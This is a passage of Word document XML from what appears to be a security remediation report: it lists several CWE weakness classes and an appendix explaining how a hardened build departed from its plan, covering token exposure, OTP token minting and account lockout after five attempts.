        <w:t>CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes (mass assignment).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CWE-307: Improper Restriction of Excessive Authentication Attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CWE-639: Authorization Bypass Through User-Controlled Key (IDOR).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CWE-330: Use of Insufficiently Random Values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CWE-204: Observable Response Discrepancy (user enumeration).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Appendix — Deviations from the plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Observability endpoint. </w:t>
      </w:r>
      <w:r>
        <w:t>Hardened /outbox returns delivery STATUS ONLY by default; the vulnerable build's /outbox was itself a total secret-leak, so exposing raw tokens/OTPs there was removed rather than reproduced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Harness switch. </w:t>
      </w:r>
      <w:r>
        <w:t>A test-only HARNESS_EXPOSE_TOKENS switch (off by default) re-exposes tokens so the harness can drive the legitimate happy path and demonstrate the #6/#8 fixes even when a token is assumed leaked. Never enabled in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OTP → token minting. </w:t>
      </w:r>
      <w:r>
        <w:t>verify-otp cannot return the original emailed link token (it is stored hashed); on success it mints a fresh short-lived, account-bound token. This is a security improvement, noted for transparency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">#7 hardened run. </w:t>
      </w:r>
      <w:r>
        <w:t>#7 Part B (full crack) was not re-run against the hardened build: the account locks after 5 attempts, so there is nothing left to brute-force. Part A's {400:4, 429:2996} is the proof.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